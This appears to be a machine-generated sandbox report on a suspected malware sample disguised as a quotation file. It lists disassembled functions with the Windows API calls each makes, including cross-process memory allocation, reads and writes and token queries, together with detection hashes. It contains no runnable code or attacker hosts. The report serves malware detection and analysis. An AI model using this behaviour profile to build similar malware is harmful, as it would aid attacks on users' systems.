                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                      • String ID:
                                                                                      • API String ID: 2833360925-0
                                                                                      • Opcode ID: 5722cfd8e1770e25627ec113d6ff09b00caf4f03cb4d30986c5d789fae415ad1
                                                                                      • Instruction ID: 7e696ec471462dfb12bf3799b62137f7ab2d2f4082337ff6a3991765756c4a7d
                                                                                      • Opcode Fuzzy Hash: 5722cfd8e1770e25627ec113d6ff09b00caf4f03cb4d30986c5d789fae415ad1
                                                                                      • Instruction Fuzzy Hash: 41011731C01A39DBCF00AFE5E899AEDBBB8BB09705F010556E502B2241CB3495A4CBA1
                                                                                      Function 001210F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00121114
                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 00121120
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 0012112F
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 00121136
                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0012114D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 842720411-0
                                                                                      • Opcode ID: 1e87e32831bbcc18d5c7d10a1cc3a9ef4ec96ec3fdd70a9ad90af60ffcb91f25
                                                                                      • Instruction ID: 6dc3499f66fdeb4a483e2d32bb9ed5e1c05717da8b5a265f3a481bbd5214dee2
                                                                                      • Opcode Fuzzy Hash: 1e87e32831bbcc18d5c7d10a1cc3a9ef4ec96ec3fdd70a9ad90af60ffcb91f25
                                                                                      • Instruction Fuzzy Hash: 21016D79100315FFDB114F64EC49A6A3F6EEF89361B140414FA41D7350DB31DC50CAA0
                                                                                      Function 00120FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00120FCA
                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00120FD6
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00120FE5
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00120FEC
                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00121002
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 44706859-0
                                                                                      • Opcode ID: 7a5c5489eca32673e393974af274d1c48aed29d375b5ecd38dc37a7b758cabb2
                                                                                      • Instruction ID: ae8e797b54ed9d018ad681d0893b3e53d6a99649b88dd89e95091f0c9049a9ad
                                                                                      • Opcode Fuzzy Hash: 7a5c5489eca32673e393974af274d1c48aed29d375b5ecd38dc37a7b758cabb2
                                                                                      • Instruction Fuzzy Hash: E7F04F39100315FFDB214FA5AC89F5A3BADEF89762F104414F945CA291CA70DC908AA0
                                                                                      Function 00121014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0012102A
                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00121036
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00121045
                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0012104C
                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00121062
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 44706859-0
                                                                                      • Opcode ID: 8da0688ff3aa13191febc7d76d0e7a451bd031ed38778d45327fc9a525967a93
                                                                                      • Instruction ID: c1653278e230066f064cd2500560ca5a34502c43c411f12f79a10f8166c6cbda
                                                                                      • Opcode Fuzzy Hash: 8da0688ff3aa13191febc7d76d0e7a451bd031ed38778d45327fc9a525967a93
                                                                                      • Instruction Fuzzy Hash: 1DF04F39100355FFDB215FA5EC49F5A3BADEF89762F200414F945CA290CA70D8908AA0
                                                                                      Function 0013030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,0013017D,?,001332FC,?,00000001,00102592,?), ref: 00130324
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,0013017D,?,001332FC,?,00000001,00102592,?), ref: 00130331
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,0013017D,?,001332FC,?,00000001,00102592,?), ref: 0013033E
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,0013017D,?,001332FC,?,00000001,00102592,?), ref: 0013034B
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,0013017D,?,001332FC,?,00000001,00102592,?), ref: 00130358
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,0013017D,?,001332FC,?,00000001,00102592,?), ref: 00130365
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: b4de72970c704654712b5ffaae75d8b8ca4363b9257d67d64cff18660d0b4a00
                                                                                      • Instruction ID: 36a4b1e9267a30400de3479db76df40592e8db6ac58a41bc8f677a82a173a13d
                                                                                      • Opcode Fuzzy Hash: b4de72970c704654712b5ffaae75d8b8ca4363b9257d67d64cff18660d0b4a00
                                                                                      • Instruction Fuzzy Hash: 31019872800B15DFCB32AF66D8A0812FBF9BF642153158A3ED19652931C3B1A998CE80
                                                                                      Function 00125C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00125C58
                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00125C6F
                                                                                      • MessageBeep.USER32(00000000), ref: 00125C87
                                                                                      • KillTimer.USER32(?,0000040A), ref: 00125CA3
                                                                                      • EndDialog.USER32(?,00000001), ref: 00125CBD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3741023627-0
                                                                                      • Opcode ID: af7bffcce8f5a4dedd386e093c86a0018839ff9a539eeb7e050be94ff956a3f0
                                                                                      • Instruction ID: 0b890fe14db93620f30d0b2c49164e126f61e0ddbf03dc2cfa188ebf058889ab
                                                                                      • Opcode Fuzzy Hash: af7bffcce8f5a4dedd386e093c86a0018839ff9a539eeb7e050be94ff956a3f0
                                                                                      • Instruction Fuzzy Hash: 4D018630500B14EFEB255F10ED8EFA677BDBB04B06F000559A583A55E1EBF0AAE48B90
                                                                                      Function 000D95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EndPath.GDI32(?), ref: 000D95D4
                                                                                      • StrokeAndFillPath.GDI32(?,?,001171F7,00000000,?,?,?), ref: 000D95F0
                                                                                      • SelectObject.GDI32(?,00000000), ref: 000D9603
                                                                                      • DeleteObject.GDI32 ref: 000D9616
                                                                                      • StrokePath.GDI32(?), ref: 000D9631
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                      • String ID:
                                                                                      • API String ID: 2625713937-0
                                                                                      • Opcode ID: 7a82e0304ac4b490f9c3c951ec0800a4157eb697475086fa59e983aec0f3d429
                                                                                      • Instruction ID: dbeab94d337b0dc8d52bf98d906ebf92e563f548e991b312f249c0a3c6cd05f8
                                                                                      • Opcode Fuzzy Hash: 7a82e0304ac4b490f9c3c951ec0800a4157eb697475086fa59e983aec0f3d429
                                                                                      • Instruction Fuzzy Hash: 6EF0373400670AFFDB625F69ED5CB683BA1EB003AAF048226F425599F0C73189D1DF64
                                                                                      Function 0013581E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 336comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C3A97,?,?,000C2E7F,?,?,?,00000000), ref: 000C3AC2
                                                                                      • CoInitialize.OLE32(00000000), ref: 00135995
                                                                                      • CoCreateInstance.OLE32(0015FCF8,00000000,00000001,0015FB68,?), ref: 001359AE
                                                                                      • CoUninitialize.OLE32 ref: 001359CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 3769357847-24824748
                                                                                      • Opcode ID: 96ae7aaf4f45f504de1a72acfd6c2d9399b5508efcb8d881ad92f59ac07c07a5
                                                                                      • Instruction ID: d046deeca5c90afedf59c3c2adf6e577c98fc09c0d523a38f3b7b8c8d7ec895b
                                                                                      • Opcode Fuzzy Hash: 96ae7aaf4f45f504de1a72acfd6c2d9399b5508efcb8d881ad92f59ac07c07a5
                                                                                      • Instruction Fuzzy Hash: 42D13071608601DFC714DF24C484A6EBBE6EF89B14F14885DF88A9B362DB31ED45CB92
                                                                                      Function 0012C5D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 191windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0012C6EE
                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0012C79C
                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0012C7CA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info$Default
                                                                                      • String ID: 0
                                                                                      • API String ID: 1306138088-4108050209
                                                                                      • Opcode ID: 2ef133de3537133c694dda658221fa62b40f066d9c06ff162c16397898bc2ea7
                                                                                      • Instruction ID: 10c18c4ea0c7169c71e02e6a9d18c5b5c5b16817a4b3233b83832011ba50ed38
                                                                                      • Opcode Fuzzy Hash: 2ef133de3537133c694dda658221fa62b40f066d9c06ff162c16397898bc2ea7
                                                                                      • Instruction Fuzzy Hash: AB51F1716043219BD7149F28E884BAF77E8AF49314F040A2DFA95E3291DB70DD64CBD2
                                                                                      Function 00122716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0012B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001221D0,?,?,00000034,00000800,?,00000034), ref: 0012B42D
                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00122760
                                                                                        • Part of subcall function 0012B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001221FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0012B3F8
                                                                                        • Part of subcall function 0012B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0012B355
                                                                                        • Part of subcall function 0012B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00122194,00000034,?,?,00001004,00000000,00000000), ref: 0012B365
                                                                                        • Part of subcall function 0012B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00122194,00000034,?,?,00001004,00000000,00000000), ref: 0012B37B
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001227CD
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0012281A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                      • String ID: @
                                                                                      • API String ID: 4150878124-2766056989
                                                                                      • Opcode ID: b0543f6659b844c0bdff4520ecda633bfcd878c939e7a1a61d27224bea4ea4ab
                                                                                      • Instruction ID: 70930119dd3e87963004a217d3f5ebc86fc4ec36f4c91b555ef1675440e5438a
                                                                                      • Opcode Fuzzy Hash: b0543f6659b844c0bdff4520ecda633bfcd878c939e7a1a61d27224bea4ea4ab
                                                                                      • Instruction Fuzzy Hash: 27412D72900228BFDB10DFA4DD81ADEBBB8EF15300F004059FA55B7181DB706E55CBA0
                                                                                      Function 0012C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0012C306
                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 0012C34C
                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00191990,00A898B8), ref: 0012C395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                      • String ID: 0
                                                                                      • API String ID: 135850232-4108050209
                                                                                      • Opcode ID: dc44fa1bf618d321511555fac3bb8570c6593337219b7d804a0c28d7e7b4c4f5
                                                                                      • Instruction ID: 523b40525d9952b4af78ab7dcca7c7262adc0419d9965458090293cb29807037
                                                                                      • Opcode Fuzzy Hash: dc44fa1bf618d321511555fac3bb8570c6593337219b7d804a0c28d7e7b4c4f5
                                                                                      • Instruction Fuzzy Hash: 3041BE312043519FD724DF25E884B6EBBE8BF95320F008A1DFAA5972D1D730E914CBA2
                                                                                      Function 0012CF00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0012DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0012CF22,?), ref: 0012DDFD
                                                                                        • Part of subcall function 0012DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0012CF22,?), ref: 0012DE16
                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0012CF45
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0012CF7F
                                                                                      • SHFileOperationW.SHELL32(?), ref: 0012D061
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFullNamePath$MoveOperationlstrcmpi
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 67141772-1173974218
                                                                                      • Opcode ID: d3057fc7fad48b6a545a4907b12d3bdd02214f6bf0fb4aaa5ed399fd81330b19
                                                                                      • Instruction ID: a9dc0f05ac89c7189675b353ac249182715ddd9c877ba556f4baff35c5a5ac70
                                                                                      • Opcode Fuzzy Hash: d3057fc7fad48b6a545a4907b12d3bdd02214f6bf0fb4aaa5ed399fd81330b19
                                                                                      • Instruction Fuzzy Hash: 154139719452299FDF12EFA4EA81EDD77F9AF18340F1000E6E645EB142EB34A794CB50
                                                                                      Function 00154416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0015CC08,00000000,?,?,?,?), ref: 001544AA
                                                                                      • GetWindowLongW.USER32 ref: 001544C7
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001544D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID: SysTreeView32
                                                                                      • API String ID: 847901565-1698111956
                                                                                      • Opcode ID: 747af6f29087c012aa78ee1dbd2d111aff8b9a976bd71cbff5207acd95741866
                                                                                      • Instruction ID: 008eebb42409e0576dcacfa4fa424bdf95839a0324d4a0a2903df519f44eae17
                                                                                      • Opcode Fuzzy Hash: 747af6f29087c012aa78ee1dbd2d111aff8b9a976bd71cbff5207acd95741866
                                                                                      • Instruction Fuzzy Hash: 74319A31250205AFDF208E78DC45BEA7BA9EB08329F204315FD79A62E1D770EC949B50
                                                                                      Function 00153EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00153F40
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00153F54
                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00153F78
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window
                                                                                      • String ID: SysMonthCal32
                                                                                      • API String ID: 2326795674-1439706946
                                                                                      • Opcode ID: 31810c87d906c49b5d74eb1ef302a2e36bbd8866d1ad25982859382db440b486
                                                                                      • Instruction ID: 0a8715f2fe0a9095e3f7880640380035eb1b5915da1eb165fb220645fb99a3cb
                                                                                      • Opcode Fuzzy Hash: 31810c87d906c49b5d74eb1ef302a2e36bbd8866d1ad25982859382db440b486
                                                                                      • Instruction Fuzzy Hash: B121BC32600219BFDF218F90CC46FEA3BB9EB48754F110215FE256B1D0D7B1A9A4CBA0
                                                                                      Function 00154653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00154705
                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00154713
